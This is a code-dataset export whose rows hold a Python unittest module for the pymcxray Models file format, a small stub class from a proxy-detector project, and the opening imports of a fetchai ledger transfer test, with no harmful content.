hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
30246c96fb84104834e1dc10d2e095c84bd5af1d
| 20,926
|
py
|
Python
|
pymcxray/FileFormat/test_Models.py
|
drix00/pymcxray
|
bf650aa0f31c635040a6cb79fe1cb7ecf27b8990
|
[
"Apache-2.0"
] | 1
|
2020-07-23T12:13:30.000Z
|
2020-07-23T12:13:30.000Z
|
pymcxray/FileFormat/test_Models.py
|
drix00/pymcxray
|
bf650aa0f31c635040a6cb79fe1cb7ecf27b8990
|
[
"Apache-2.0"
] | 3
|
2017-03-05T16:09:30.000Z
|
2017-03-05T16:11:41.000Z
|
pymcxray/FileFormat/test_Models.py
|
drix00/pymcxray
|
bf650aa0f31c635040a6cb79fe1cb7ecf27b8990
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""
.. py:currentmodule:: FileFormat.test_Models
.. moduleauthor:: Hendrix Demers <hendrix.demers@mail.mcgill.ca>
Tests module `Models`.
"""
# Script information for the file.
__author__ = "Hendrix Demers (hendrix.demers@mail.mcgill.ca)"
__version__ = ""
__date__ = ""
__copyright__ = "Copyright (c) 2012 Hendrix Demers"
__license__ = ""
# Subversion informations for the file.
__svnRevision__ = "$Revision$"
__svnDate__ = "$Date$"
__svnId__ = "$Id$"
# Standard library modules.
import unittest
import logging
import os.path
# Third party modules.
from nose.plugins.skip import SkipTest
# Local modules.
# Project modules
import pymcxray.FileFormat.Models as Models
import pymcxray.FileFormat.MCXRayModel as MCXRayModel
import pymcxray.FileFormat.testUtilities as testUtilities
import pymcxray.FileFormat.Version as Version
# Globals and constants variables.
class TestModels(unittest.TestCase):
"""
TestCase class for the module `Models`.
"""
def setUp(self):
"""
Setup method.
"""
unittest.TestCase.setUp(self)
self.testDataPath = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../test_data"))
self.tempDataPath = testUtilities.createTempDataPath(self.testDataPath)
self.numberModels = 13
def tearDown(self):
"""
Teardown method.
"""
unittest.TestCase.tearDown(self)
testUtilities.removeTempDataPath(self.tempDataPath)
def testSkeleton(self):
"""
First test to check if the testcase is working with the testing framework.
"""
#self.fail("Test if the testcase is working.")
self.assert_(True)
def test_read(self):
"""
Tests for method `read`.
"""
models = Models.Models()
for title in testUtilities.getSimulationTitles():
filepath = os.path.abspath(os.path.join(self.testDataPath, "%s/%s.mdl" % (title, title)))
models.read(filepath)
modelList = models.getModelList()
self.assertEquals(self.numberModels, len(modelList))
self.assertEquals(MCXRayModel.AtomMeanIonizationPotentialModel.TYPE_JOY_LUO, modelList[Models.KEY_ATOM_MEAN_IONIZATION_POTENTIAL_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomEnergyLossModel.TYPE_BETHE, modelList[Models.KEY_ATOM_ENERGY_LOSS_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_SCREENING_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCrossSectionModel.TYPE_BROWNING, modelList[Models.KEY_ATOM_CROSS_SECTION_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCrossSectionScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_CROSS_SECTION_SCREENING_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCollisionModel.TYPE_BROWNING, modelList[Models.KEY_ATOM_COLLISION_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCollisionScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_COLLISION_SCREENING_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomElectronRangeModel.TYPE_KANAYA_OKAYAMA, modelList[Models.KEY_ATOM_ELECTRON_RANGE_MODEL].getModel())
self.assertEquals(MCXRayModel.XRayCSCharacteristicModel.TYPE_CASTANI1982, modelList[Models.KEY_XRAY_CS_CHARACTERISTIC_MODEL].getModel())
self.assertEquals(MCXRayModel.XRayCSBremsstrahlungModel.TYPE_DING, modelList[Models.KEY_XRAY_CS_BREMSSTRAHLUNG_MODEL].getModel())
self.assertEquals(MCXRayModel.SampleEnergyLossModel.TYPE_BETHE_JOY_LUO, modelList[Models.KEY_SAMPLE_ENERGY_LOSS_MODEL].getModel())
self.assertEquals(MCXRayModel.RegionEnergyLossModel.TYPE_BETHE_JOY_LUO, modelList[Models.KEY_REGION_ENERGY_LOSS_MODEL].getModel())
self.assertEquals(MCXRayModel.MassAbsorptionCoefficientModel.TYPE_CHANTLER2005, modelList[Models.KEY_MASS_ABSORPTION_COEFFICIENT_MODEL].getModel())
#self.fail("Test if the testcase is working.")
def test_read_1_1_1(self):
"""
Tests for method `read`.
"""
models = Models.Models()
title = "AlMgBulk5keV_version_1_1_1"
filepath = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.mdl" % (title)))
models.read(filepath)
self.assertEquals(Version.VERSION_1_1_1.major, models.version.major)
self.assertEquals(Version.VERSION_1_1_1.minor, models.version.minor)
self.assertEquals(Version.VERSION_1_1_1.revision, models.version.revision)
self.assertEquals(Version.VERSION_1_1_1, models.version)
modelList = models.getModelList()
self.assertEquals(self.numberModels, len(modelList))
self.assertEquals(MCXRayModel.AtomMeanIonizationPotentialModel.TYPE_JOY_LUO, modelList[Models.KEY_ATOM_MEAN_IONIZATION_POTENTIAL_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomEnergyLossModel.TYPE_BETHE, modelList[Models.KEY_ATOM_ENERGY_LOSS_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_SCREENING_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCrossSectionModel.TYPE_BROWNING, modelList[Models.KEY_ATOM_CROSS_SECTION_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCrossSectionScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_CROSS_SECTION_SCREENING_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCollisionModel.TYPE_BROWNING, modelList[Models.KEY_ATOM_COLLISION_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCollisionScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_COLLISION_SCREENING_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomElectronRangeModel.TYPE_KANAYA_OKAYAMA, modelList[Models.KEY_ATOM_ELECTRON_RANGE_MODEL].getModel())
self.assertEquals(MCXRayModel.XRayCSCharacteristicModel.TYPE_CASTANI1982, modelList[Models.KEY_XRAY_CS_CHARACTERISTIC_MODEL].getModel())
self.assertEquals(MCXRayModel.XRayCSBremsstrahlungModel.TYPE_KIRKPATRICK_WIEDMAN, modelList[Models.KEY_XRAY_CS_BREMSSTRAHLUNG_MODEL].getModel())
self.assertEquals(MCXRayModel.SampleEnergyLossModel.TYPE_BETHE_JOY_LUO, modelList[Models.KEY_SAMPLE_ENERGY_LOSS_MODEL].getModel())
#self.fail("Test if the testcase is working.")
def test_read_1_2_0(self):
"""
Tests for method `read`.
"""
models = Models.Models()
title = "AlMgBulk5keV_version_1_2_0"
filepath = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.mdl" % (title)))
models.read(filepath)
self.assertEquals(Version.VERSION_1_2_0.major, models.version.major)
self.assertEquals(Version.VERSION_1_2_0.minor, models.version.minor)
self.assertEquals(Version.VERSION_1_2_0.revision, models.version.revision)
self.assertEquals(Version.VERSION_1_2_0, models.version)
modelList = models.getModelList()
self.assertEquals(self.numberModels, len(modelList))
self.assertEquals(MCXRayModel.AtomMeanIonizationPotentialModel.TYPE_JOY_LUO, modelList[Models.KEY_ATOM_MEAN_IONIZATION_POTENTIAL_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomEnergyLossModel.TYPE_BETHE, modelList[Models.KEY_ATOM_ENERGY_LOSS_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_SCREENING_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCrossSectionModel.TYPE_GAUVIN_DROUIN, modelList[Models.KEY_ATOM_CROSS_SECTION_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCrossSectionScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_CROSS_SECTION_SCREENING_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCollisionModel.TYPE_RUTHERFORD, modelList[Models.KEY_ATOM_COLLISION_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCollisionScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_COLLISION_SCREENING_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomElectronRangeModel.TYPE_KANAYA_OKAYAMA, modelList[Models.KEY_ATOM_ELECTRON_RANGE_MODEL].getModel())
self.assertEquals(MCXRayModel.XRayCSCharacteristicModel.TYPE_CASTANI1982, modelList[Models.KEY_XRAY_CS_CHARACTERISTIC_MODEL].getModel())
self.assertEquals(MCXRayModel.XRayCSBremsstrahlungModel.TYPE_DING, modelList[Models.KEY_XRAY_CS_BREMSSTRAHLUNG_MODEL].getModel())
self.assertEquals(MCXRayModel.SampleEnergyLossModel.TYPE_BETHE_JOY_LUO, modelList[Models.KEY_SAMPLE_ENERGY_LOSS_MODEL].getModel())
#self.fail("Test if the testcase is working.")
def test_read_1_2_1(self):
"""
Tests for method `read`.
"""
models = Models.Models()
title = "AlMgBulk5keV_version_1_2_1"
filepath = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.mdl" % (title)))
models.read(filepath)
self.assertEquals(Version.VERSION_1_2_1.major, models.version.major)
self.assertEquals(Version.VERSION_1_2_1.minor, models.version.minor)
self.assertEquals(Version.VERSION_1_2_1.revision, models.version.revision)
self.assertEquals(Version.VERSION_1_2_1, models.version)
modelList = models.getModelList()
self.assertEquals(self.numberModels, len(modelList))
self.assertEquals(MCXRayModel.AtomMeanIonizationPotentialModel.TYPE_JOY_LUO, modelList[Models.KEY_ATOM_MEAN_IONIZATION_POTENTIAL_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomEnergyLossModel.TYPE_BETHE, modelList[Models.KEY_ATOM_ENERGY_LOSS_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_SCREENING_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCrossSectionModel.TYPE_GAUVIN_DROUIN, modelList[Models.KEY_ATOM_CROSS_SECTION_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCrossSectionScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_CROSS_SECTION_SCREENING_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCollisionModel.TYPE_RUTHERFORD, modelList[Models.KEY_ATOM_COLLISION_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCollisionScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_COLLISION_SCREENING_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomElectronRangeModel.TYPE_KANAYA_OKAYAMA, modelList[Models.KEY_ATOM_ELECTRON_RANGE_MODEL].getModel())
self.assertEquals(MCXRayModel.XRayCSCharacteristicModel.TYPE_CASTANI1982, modelList[Models.KEY_XRAY_CS_CHARACTERISTIC_MODEL].getModel())
self.assertEquals(MCXRayModel.XRayCSBremsstrahlungModel.TYPE_DING, modelList[Models.KEY_XRAY_CS_BREMSSTRAHLUNG_MODEL].getModel())
self.assertEquals(MCXRayModel.SampleEnergyLossModel.TYPE_BETHE_JOY_LUO, modelList[Models.KEY_SAMPLE_ENERGY_LOSS_MODEL].getModel())
#self.fail("Test if the testcase is working.")
def test_read_1_4_1(self):
"""
Tests for method `read`.
"""
models = Models.Models()
title = "AlMgBulk5keV_version_1_4_1"
filepath = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.mdl" % (title)))
models.read(filepath)
self.assertEquals(Version.VERSION_1_4_1.major, models.version.major)
self.assertEquals(Version.VERSION_1_4_1.minor, models.version.minor)
self.assertEquals(Version.VERSION_1_4_1.revision, models.version.revision)
self.assertEquals(Version.VERSION_1_4_1, models.version)
modelList = models.getModelList()
self.assertEquals(self.numberModels, len(modelList))
self.assertEquals(MCXRayModel.AtomMeanIonizationPotentialModel.TYPE_JOY_LUO, modelList[Models.KEY_ATOM_MEAN_IONIZATION_POTENTIAL_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomEnergyLossModel.TYPE_BETHE, modelList[Models.KEY_ATOM_ENERGY_LOSS_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_SCREENING_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCrossSectionModel.TYPE_GAUVIN_DROUIN, modelList[Models.KEY_ATOM_CROSS_SECTION_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCrossSectionScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_CROSS_SECTION_SCREENING_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCollisionModel.TYPE_RUTHERFORD, modelList[Models.KEY_ATOM_COLLISION_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCollisionScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_COLLISION_SCREENING_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomElectronRangeModel.TYPE_KANAYA_OKAYAMA, modelList[Models.KEY_ATOM_ELECTRON_RANGE_MODEL].getModel())
self.assertEquals(MCXRayModel.XRayCSCharacteristicModel.TYPE_CASTANI1982, modelList[Models.KEY_XRAY_CS_CHARACTERISTIC_MODEL].getModel())
self.assertEquals(MCXRayModel.XRayCSBremsstrahlungModel.TYPE_DING, modelList[Models.KEY_XRAY_CS_BREMSSTRAHLUNG_MODEL].getModel())
self.assertEquals(MCXRayModel.SampleEnergyLossModel.TYPE_BETHE_JOY_LUO, modelList[Models.KEY_SAMPLE_ENERGY_LOSS_MODEL].getModel())
self.assertEquals(MCXRayModel.RegionEnergyLossModel.TYPE_BETHE_JOY_LUO, modelList[Models.KEY_REGION_ENERGY_LOSS_MODEL].getModel())
self.assertEquals(MCXRayModel.MassAbsorptionCoefficientModel.TYPE_CHANTLER2005, modelList[Models.KEY_MASS_ABSORPTION_COEFFICIENT_MODEL].getModel())
#self.fail("Test if the testcase is working.")
def test__createKeys(self):
"""
Tests for method `_createKeys`.
"""
keys = Models.Models()._createKeys()
self.assertEquals(self.numberModels, len(keys))
#self.fail("Test if the testcase is working.")
def testDefaultModels(self):
"""
Tests for method `read`.
"""
models = Models.Models()
modelList = models.getModelList()
self.assertEquals(self.numberModels, len(modelList))
self.assertEquals(MCXRayModel.AtomMeanIonizationPotentialModel.TYPE_JOY_LUO, modelList[Models.KEY_ATOM_MEAN_IONIZATION_POTENTIAL_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomEnergyLossModel.TYPE_BETHE, modelList[Models.KEY_ATOM_ENERGY_LOSS_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_SCREENING_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCrossSectionModel.TYPE_BROWNING, modelList[Models.KEY_ATOM_CROSS_SECTION_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCrossSectionScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_CROSS_SECTION_SCREENING_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCollisionModel.TYPE_BROWNING, modelList[Models.KEY_ATOM_COLLISION_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomCollisionScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_COLLISION_SCREENING_MODEL].getModel())
self.assertEquals(MCXRayModel.AtomElectronRangeModel.TYPE_KANAYA_OKAYAMA, modelList[Models.KEY_ATOM_ELECTRON_RANGE_MODEL].getModel())
self.assertEquals(MCXRayModel.XRayCSCharacteristicModel.TYPE_BOTE2009, modelList[Models.KEY_XRAY_CS_CHARACTERISTIC_MODEL].getModel())
self.assertEquals(MCXRayModel.XRayCSBremsstrahlungModel.TYPE_KIRKPATRICK_WIEDMAN, modelList[Models.KEY_XRAY_CS_BREMSSTRAHLUNG_MODEL].getModel())
self.assertEquals(MCXRayModel.SampleEnergyLossModel.TYPE_BETHE_JOY_LUO, modelList[Models.KEY_SAMPLE_ENERGY_LOSS_MODEL].getModel())
#self.fail("Test if the testcase is working.")
def test_write(self):
"""
Tests for method `write`.
"""
raise SkipTest
self.maxDiff = None
for title in testUtilities.getSimulationTitles():
filepathReference = os.path.abspath(os.path.join(self.testDataPath, "%s/%s.mdl" % (title, title)))
filepath = os.path.join(self.tempDataPath, "%s.mdl" % (title))
models = Models.Models()
models._modelList[Models.KEY_XRAY_CS_BREMSSTRAHLUNG_MODEL].setModel(MCXRayModel.XRayCSBremsstrahlungModel.TYPE_DING)
models.write(filepath)
linesRef = open(filepathReference, 'r').readlines()
lines = open(filepath, 'r').readlines()
self.assertListEqual(linesRef, lines)
#self.fail("Test if the testcase is working.")
def test_write_1_1_1(self):
"""
Tests for method `write`.
"""
raise SkipTest
self.maxDiff = None
title = "AlMgBulk5keV_version_1_1_1"
filepathReference = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.mdl" % (title)))
filepath = os.path.join(self.tempDataPath, "%s.par" % (title))
models = Models.Models()
models._modelList[Models.KEY_XRAY_CS_BREMSSTRAHLUNG_MODEL].setModel(MCXRayModel.XRayCSBremsstrahlungModel.TYPE_DING)
models.write(filepath)
linesRef = open(filepathReference, 'r').readlines()
lines = open(filepath, 'r').readlines()
self.assertListEqual(linesRef, lines)
self.fail("Test if the testcase is working.")
def test_write_1_2_0(self):
"""
Tests for method `write`.
"""
self.maxDiff = None
title = "AlMgBulk5keV_version_1_2_0"
filepathReference = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.mdl" % (title)))
filepath = os.path.join(self.tempDataPath, "%s.par" % (title))
models = Models.Models()
models.version = Version.VERSION_1_2_0
models._modelList[Models.KEY_XRAY_CS_CHARACTERISTIC_MODEL].setModel(MCXRayModel.XRayCSCharacteristicModel.TYPE_CASTANI1982)
models._modelList[Models.KEY_XRAY_CS_BREMSSTRAHLUNG_MODEL].setModel(MCXRayModel.XRayCSBremsstrahlungModel.TYPE_DING)
models._modelList[Models.KEY_ATOM_CROSS_SECTION_MODEL].setModel(MCXRayModel.AtomCrossSectionModel.TYPE_GAUVIN_DROUIN)
models._modelList[Models.KEY_ATOM_COLLISION_MODEL].setModel(MCXRayModel.AtomCollisionModel.TYPE_RUTHERFORD)
models.write(filepath)
linesRef = open(filepathReference, 'r').readlines()
lines = open(filepath, 'r').readlines()
self.assertListEqual(linesRef, lines)
#self.fail("Test if the testcase is working.")
def test_write_1_2_1(self):
"""
Tests for method `write`.
"""
self.maxDiff = None
title = "AlMgBulk5keV_version_1_2_1"
filepathReference = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.mdl" % (title)))
filepath = os.path.join(self.tempDataPath, "%s.par" % (title))
models = Models.Models()
models.version = Version.VERSION_1_2_1
models._modelList[Models.KEY_XRAY_CS_CHARACTERISTIC_MODEL].setModel(MCXRayModel.XRayCSCharacteristicModel.TYPE_CASTANI1982)
models._modelList[Models.KEY_XRAY_CS_BREMSSTRAHLUNG_MODEL].setModel(MCXRayModel.XRayCSBremsstrahlungModel.TYPE_DING)
models._modelList[Models.KEY_ATOM_CROSS_SECTION_MODEL].setModel(MCXRayModel.AtomCrossSectionModel.TYPE_GAUVIN_DROUIN)
models._modelList[Models.KEY_ATOM_COLLISION_MODEL].setModel(MCXRayModel.AtomCollisionModel.TYPE_RUTHERFORD)
models.write(filepath)
linesRef = open(filepathReference, 'r').readlines()
lines = open(filepath, 'r').readlines()
self.assertListEqual(linesRef, lines)
#self.fail("Test if the testcase is working.")
def test_write_1_4_1(self):
"""
Tests for method `write`.
"""
self.maxDiff = None
title = "AlMgBulk5keV_version_1_4_1"
filepathReference = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.mdl" % (title)))
filepath = os.path.join(self.tempDataPath, "%s.par" % (title))
models = Models.Models()
models.version = Version.VERSION_1_4_1
models._modelList[Models.KEY_XRAY_CS_CHARACTERISTIC_MODEL].setModel(MCXRayModel.XRayCSCharacteristicModel.TYPE_CASTANI1982)
models._modelList[Models.KEY_XRAY_CS_BREMSSTRAHLUNG_MODEL].setModel(MCXRayModel.XRayCSBremsstrahlungModel.TYPE_DING)
models._modelList[Models.KEY_ATOM_CROSS_SECTION_MODEL].setModel(MCXRayModel.AtomCrossSectionModel.TYPE_GAUVIN_DROUIN)
models._modelList[Models.KEY_ATOM_COLLISION_MODEL].setModel(MCXRayModel.AtomCollisionModel.TYPE_RUTHERFORD)
models.write(filepath)
linesRef = open(filepathReference, 'r').readlines()
lines = open(filepath, 'r').readlines()
self.assertListEqual(linesRef, lines)
#self.fail("Test if the testcase is working.")
if __name__ == '__main__': #pragma: no cover
import nose
nose.runmodule()
| 51.541872
| 161
| 0.751314
| 2,264
| 20,926
| 6.653269
| 0.083039
| 0.098785
| 0.100378
| 0.123216
| 0.923189
| 0.913829
| 0.911771
| 0.903804
| 0.893912
| 0.889796
| 0
| 0.009143
| 0.148045
| 20,926
| 405
| 162
| 51.669136
| 0.835764
| 0.064513
| 0
| 0.701754
| 0
| 0
| 0.026892
| 0.012456
| 0
| 0
| 0
| 0
| 0.434211
| 1
| 0.065789
| false
| 0
| 0.039474
| 0
| 0.109649
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
06ac8da4ef92ac43c59ca28a4de8fa7211847b84
| 214
|
py
|
Python
|
proxydetectorfirewall/format/format.py
|
Juvenal-Yescas/ProxyDetector-Firewall
|
fed1db3d2be28ce55f797a134c65d18d09110c0b
|
[
"MIT"
] | 4
|
2019-10-22T01:27:47.000Z
|
2021-03-01T08:33:09.000Z
|
proxydetectorfirewall/format/format.py
|
Juvenal-Yescas/ProxyDetector-Firewall
|
fed1db3d2be28ce55f797a134c65d18d09110c0b
|
[
"MIT"
] | null | null | null |
proxydetectorfirewall/format/format.py
|
Juvenal-Yescas/ProxyDetector-Firewall
|
fed1db3d2be28ce55f797a134c65d18d09110c0b
|
[
"MIT"
] | 3
|
2019-12-02T08:24:52.000Z
|
2020-09-11T13:40:57.000Z
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
class Format:
def __init__(self):
self.header_file = ''
def get_header(self):
return self.header_file
def getFormat(self, ip):
pass
| 16.461538
| 31
| 0.579439
| 27
| 214
| 4.333333
| 0.666667
| 0.17094
| 0.239316
| 0.290598
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012987
| 0.280374
| 214
| 13
| 32
| 16.461538
| 0.746753
| 0.182243
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0.142857
| 0
| 0.142857
| 0.714286
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 7
|
88d86652ba11900936fea83cfbb75ae2dc32474f
| 14,659
|
py
|
Python
|
tests/commands/test_transfer.py
|
ejfitzgerald/tools-pocketbook
|
c36254f3e39e875cacf50a5e90b9723e19c1ed9b
|
[
"Apache-2.0"
] | 1
|
2021-09-08T05:30:11.000Z
|
2021-09-08T05:30:11.000Z
|
tests/commands/test_transfer.py
|
ejfitzgerald/tools-pocketbook
|
c36254f3e39e875cacf50a5e90b9723e19c1ed9b
|
[
"Apache-2.0"
] | 14
|
2019-12-30T17:43:22.000Z
|
2021-11-18T10:45:14.000Z
|
tests/commands/test_transfer.py
|
ejfitzgerald/tools-pocketbook
|
c36254f3e39e875cacf50a5e90b9723e19c1ed9b
|
[
"Apache-2.0"
] | 3
|
2019-12-24T10:50:44.000Z
|
2021-11-20T21:24:32.000Z
|
import unittest
from unittest.mock import patch, Mock, MagicMock
from fetchai.ledger.api.token import TokenTxFactory
from fetchai.ledger.crypto import Entity, Address
from fetchai.ledger.serialisation.transaction import encode_transaction
